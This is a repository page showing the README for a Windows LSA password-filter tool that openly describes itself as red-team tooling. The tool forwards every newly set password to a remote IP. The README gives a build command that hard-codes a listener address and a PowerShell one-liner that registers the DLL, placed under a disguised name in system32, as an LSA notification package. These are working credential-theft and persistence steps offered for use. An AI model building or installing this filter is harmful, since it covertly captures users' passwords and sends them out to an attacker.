Windows Password Filter

⌈⌋ ⎇ branch:  win-pass-filter


Artifact Content

Check-ins Using Download Hex Wiki

Artifact 852c2c475e9acbb034513e41e6f0bf0f0a9afcdf10fc5af559c7646a12e5a83d:

  • File README.md — part of check-in [f2dea56b19] at 2019-06-07 00:51:53 on branch trunk — Initial Commit (user: brimstone size: 918) 
win-pass-filter
===============

_stolen from https://github.com/iDigitalFlame/redteam-tools_

This is a windows LSA password filter that sends the new password to an IP of
your choosing.

Build
-----

Simply build for windows with CGO enabled and the appropriate receiver listing
port.
```
GOOS=windows CGO_ENABLED=1 go build -v -x -o filter.dll -buildmode=c-shared -ldflags 'main.remote=192.168.0.100:4444'
```


Install
-------

Copy the `filter.dll` to somewhere like `c:\windows\system32\idk.dll` and
install with powershell
```
powershell -com "$a='idk';$b=(Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages').'Notification Packages'; Set-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'Notification Packages' -Value ""$b`r`n$a"""
```

If you change the name of the dll in `c:\windows\system32` then also update the
`$a` variable.

Reboot when finished.